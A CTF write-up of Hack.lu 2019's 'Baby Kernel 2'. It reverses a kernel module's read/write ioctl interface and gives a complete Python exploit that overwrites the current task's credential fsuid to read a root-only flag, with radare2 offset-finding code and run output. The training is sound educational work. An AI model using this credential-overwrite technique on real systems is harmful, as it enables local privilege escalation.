Hack.lu 2019 - Baby Kernel 2 challenge writeup

Last october, I participated to Hack.lu Capture The Flag with my team Securimag.

I did this writeup as all the ones I've read do not explain how they managed to reliably find the offset of real_cred in the current_task structure.

I didn't have much time to allocate for that challenge, and as I'm interested in exploitation, I quickly jumped on "Baby Kernel 2" as it was marked as easy and dealing with kernels.

Overview

The challenge provides a ZIP archive that contains multiple files:

vmlinux - A linux kernel
System.map - The symbols location for that kernel
initramfs.cpio.gz - The initial root filesystem
bzImage - Contains the bootloader and the stripped and compressed kernel
run.sh - A script to run the kernel with qemu

Note: In the archive I provide, I removed vmlinux as it is quite heavy and unecessary because System.map is given as well.

It is possible to extract the kernel from bzImage by using the extract-vmlinux script from the linux kernel source code. Otherwise, binwalk will manage to extract it as well:

# Extract with extract-vmlinux
./extract-vmlinux ./bzImage > vmlinux
# Extract with binwalk
binwalk -e ./bzImage

Let's run it to see what it looks like:

./run.sh

...

----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
>

Right after the linux VM booted, there's not shell to greet us, but only a small program that asks us do to an action.

Understanding everything

Since I was not doing the CTF to win, but rather just for fun, I decided to take the time to understand everything.

First of all, I decided to extract the default file system to see what was available on the system. To do so I used the following commands:

$ mkdir root
$ cd root
$ cp ../initramfs.cpio.gz ./
$ gunzip ./initramfs.cpio.gz
$ cpio -id < ./initramfs.cpio
7393 blocks
$ ls
bin  client_kernel_baby_2  etc  flag  home  init  initramfs.cpio  lib  proc  root  sys  usr  var
$

Now to understand what was this program that was ran during startup, I read the init file. There are many lines, but more importantly:

chmod 700 /flag
mkdir -p /lib/modules/$(uname -r)
insmod "/lib/modules/$(uname -r)/kernel_baby_2.ko"
chmod +rw /dev/flux_baby_2
chmod +x /client_kernel_baby_2
sleep 2
su user -c /client_kernel_baby_2

During init the file /flag is set to read, write and execute permissions for user root only.
A kernel module is loaded
The file /client_kernel_baby_2 is set as executable, and is started with the user named user.

The client

Quickly, I decided to check what the client file does. In fact, I was intrigued as the challenge was supposed to be an easy kernel exploitation, but here only a userland application was available.

The binary is not stripped, and we can quickly understand what is happening. Using radare2, I quickly disassembled the program to understand what it does. As we've seen above, there are 6 actions available and 3 to 6 do what they mean to do.

The command 3 will call system("id");
The command 4 will read try to open /flag and read its content.
The command 5 will print a hint.
The command 6 will exit the program, that will cause the system to halt.

So nothing suprising from here, but what do 1 and 2 do exactly? There are two unstripped functions in the binary that are named do_read and do_write. And what do they do? They trigger an ioctl (request 901 for the read function, request 902 for the write function) with the given parameters that are read from the user input.

Alright, so I think it's time to disassemble the kernel module.

The kernel module

The kernel module is rather small, and not stripped. We can spot the function driver_ioctl and inspect it. It will compare the first argument with 901 and 902 and if it matches any it will either call the function read or _copy_from_user respectively with the arguments from the user.

The function read will use copy_to_user to read data from the kernel to userland, and copy_from_user is used to copy data from userland (our input program) into the kernel.

So now it's becoming clearer that we can interact with kernel land through the provided program.

Exploitation

So, the goal of the challenge is to read the /flag file, but as we've seen earlier, it is readable for user root only. How can we do that? Well I think there are multiple ways of doing it, but here is the way I chose. Since it's not necessary to pop a shell or anything too complicated, the only goal of the challenge is to elevate the privileges of the current process to root.

Usually it is possible to do so by calling commit_creds(prepare_kernel_cred(0));. In our context all we can do is read and write some kernel space memory. So let's see what the commit_creds function do.

int commit_creds(struct cred *new)
{
	struct task_struct *task = current;
	const struct cred *old = task->real_cred;

	/* ... */

	rcu_assign_pointer(task->real_cred, new);
	rcu_assign_pointer(task->cred, new);

	/* ... */

	/* release the old obj and subj refs both */
	put_cred(old);
	put_cred(old);
	return 0;
}

The linux kernel provides a macro current also known as struct task_struct *current_task that is a pointer to the currently executed process.

Here the function commit_creds just updates the current->real_cred and current->cred pointers to the new credentials.

The task_struct structure is quite big, but has indeed the real_cred and cred members:

struct task_struct {
	/* ... */

	/* Process credentials: */
	/* Tracer's credentials at attach: */
	const struct cred __rcu		*ptracer_cred;
	/* Objective and real subjective task credentials (COW): */
	const struct cred __rcu		*real_cred;
	/* Effective (overridable) subjective task credentials (COW): */
	const struct cred __rcu		*cred;

	/* ... */
};

The cred structure looks as follows:

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;			/* Can we skip RCU deletion? */
		struct rcu_head	rcu;		/* RCU deletion hook */
	};
} __randomize_layout;

In the end, what we can do is just to overwrite most of the real_cred structure members to update the user id and group id to 0 (root) until we can manage to read the flag. In fact, it is only necessary to update the fsuid field as it is the one that will be checked when accessing a file on the filesystem.

Once we understood all of this, we have to find where those fields are located in the memory. Luckily, we were provided the System.map file that contains all the symbols we need. In the original archive, vmlinux was also provided and already contained all those symbols. The first action that is done in the commit_creds function is to dereference the current_task and access the real_cred member.

int commit_creds(struct cred *new)
{
	struct task_struct *task = current;
	const struct cred *old = task->real_cred;
	/* ... */
}

We can retrieve the offset for commit_creds with a single grep command:

$ grep commit_creds ./System.map
ffffffff81050c50 T commit_creds
ffffffff816d4c80 r __ksymtab_commit_creds
ffffffff816dc9b2 r __kstrtab_commit_creds

And now check the disassembly inside radare2:

$ r2 ./vmlinux
[0x01000000]> pd 10 @ 0xffffffff81050c50
            0xffffffff81050c50      55             push rbp
            0xffffffff81050c51      4889e5         mov rbp, rsp
            0xffffffff81050c54      4155           push r13
            0xffffffff81050c56      4c8b2c2540a0.  mov r13, qword [0xffffffff8183a040]
            0xffffffff81050c5e      4154           push r12
            0xffffffff81050c60      53             push rbx
            0xffffffff81050c61      4d8ba5f80300.  mov r12, qword [r13 + 0x3f8]
            0xffffffff81050c68      4d39a5000400.  cmp qword [r13 + 0x400], r12
        ╭─< 0xffffffff81050c6f      0f85f1000000   jne 0xffffffff81050d66
        │   0xffffffff81050c75      8b07           mov eax, dword [rdi]

As we can see the current_task pointer is dereferenced with the offset 0x3f8, so this corresponds to the real_cred pointer. It is possible to automate this process with the following python script:

import r2pipe

r2 = r2pipe.open('./vmlinux')
r2.cmd('s sym.commit_creds')
r2.cmd('aei; aeim')
for _ in range(50):
    # Step instruction per instruction
    r2.cmd('aes')
    op = r2.cmdj('aoj 1 @ PC')[0]
    # Check for memory dereference
    if len(op['opex']['operands']) == 2 and op['opex']['operands'][1]['type'] == 'mem':
        # Get reg that contains the struct pointer
        if op['opex']['operands'][1]['disp'] == current_task_addr:
            usedreg = op['opex']['operands'][0]['value']
            continue
        # If reg base is current_task, then get the offset
        if 'base' in op['opex']['operands'][1] and op['opex']['operands'][1]['base'] == usedreg:
            real_cred_offset = op['opex']['operands'][1]['disp']
            break
print(hex(real_cred_offset))
r2.quit()

And it will print this offset as well! That's the only reliable way I found to quickly compute the right offset for real_cred, as it may vary from kernel versions and compilation options.

Now using either the vmlinux file (which already contains symbols) or the System.map file, we can get the address of current_task.

The exploit will be as follow:

Get current_task pointer
Get current->real_cred pointer
Overwrite current->real_cred->fsuid to 0
Print the flag

As the initial challenge is done remotely, it's possible to make our local script act as a remote target. I use the following trick thanks to socat:

socat tcp-l:1337,reuseaddr,fork exec:"bash -c ./run.sh"

And we can create the following exploit:

#!/usr/bin/env python

import socket
import telnetlib
import r2pipe


class Socket():
    def __init__(self, host, port):
        self.s = socket.create_connection((host, port))

    def recv(self, d): return self.s.recv(d)

    def send(self, d): return self.s.send(d)

    def recv_until(self, d):
        data = b''
        if type(d) == type(''):
            d = d.encode()
        while not data.endswith(d):
            tmp = self.s.recv(1)
            if not tmp:
                break
            data += tmp
        return data

    def recv_all(self):
        data = b''
        while True:
            part = self.s.recv(4096)
            data += part
            if len(part) < 4096:
                break
        return data

    def interact(self):
        t = telnetlib.Telnet()
        t.sock = self.s
        t.interact()


def plog(m):
    print('[+] ' + m)


# Get symbols info from System.map
for l in open('./public/System.map', 'r'):
    if 'D current_task' in l:
        current_task_addr = int(l.split(' ')[0], 16)
current_task_addr = 0xffffffff8183a040
real_cred_offset = 0x3f8
plog('Found current_task: 0x{:x}'.format(current_task_addr))
plog('Found real_cred_offset: 0x{:x}'.format(real_cred_offset))


#############
# Exploit it!
print('-------------------')
plog('Connecting to remote VM...')
s = Socket('localhost', 1337)
s.recv_until(b'> ')
plog('VM Started!')

# 1. Get current_task_ptr
s.send(b'1\n')
s.recv_until(b'> ')
pl = hex(current_task_addr)[2:] + '\n'
s.send(pl.encode('utf-8'))
s.recv_until(b'power level is: ')
v = s.recv_until(b'\r\n')
current_task_ptr = int(v, 16)
plog('Found current_task pointer: 0x{:x}'.format(current_task_ptr))

# 2. Get real_cred_ptr
s.send(b'1\n')
s.recv_until(b'>')
pl = hex(current_task_ptr + real_cred_offset)[2:] + '\n'
s.send(pl.encode('utf-8'))
s.recv_until(b'power level is: ')
v = s.recv_until(b'\r\n')
real_cred_ptr = int(v, 16)
plog('Found real_cred pointer: 0x{:x}'.format(real_cred_ptr))

# 3. Overwrite everything with 0
s.recv_until(b'> ')
s.send(b'2\n')
s.recv_until(b'>')
addr = real_cred_ptr + 4 + 8*3 # 4 for usage, 8 for uid/gid, 8 for suig/sgid, 8 for euid,guid
s.send('{:x}\n'.format(addr).encode('utf-8'))
s.recv_until(b'>')
s.send(b'0\n')

# 4. Get userid
s.recv_until(b'> ')
s.send(b'3\n')
s.recv_until(b'\r\n')
userid = s.recv_until(b'\r\n')
plog('USER: {}'.format(userid.strip().decode()))

# 5. Go interactive
print(s.recv_all().decode())
s.interact()

Let's run it:

$ python solve.py
[+] Extracting symbols information from the binary...
[+] Found current_task: 0xffffffff8183a040
[+] Found commit_creds: 0xffffffff81050c50
[+] Found real_cred_offset: 0x3f8
-------------------
[+] Connecting to remote VM...
[+] VM Started!
[+] Found current_task pointer: 0xffff888003373480
[+] Found real_cred pointer: 0xffff888003382480
[+] USER: uid=1000(user) gid=1000(user) groups=1000(user)
----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
> 4
4
Which file are we trying to read?
> /flag
/flag
Here are your 0x10 bytes contents:
flag{fake_flag}

----- Menu -----
1. Read
2. Write
3. Show me my uid
4. Read file
5. Any hintz?
6. Bye!
> 6
6
flux_baby_2 closed
Bye!
ACPI: Preparing to enter system sleep state S5
reboot: Power down
*** Connection closed by remote host ***

Et voilà! Fun fact: as we only overwrite fsuid, when the id command is triggered, our uid and gid are still set to user (1000). However since we only want to access the file system, it is enough to read the file /flag and retrieve it.

Conclusion

I'd like to thank the creator of the challenge, as it was a nice way to get back to kernel exploitation.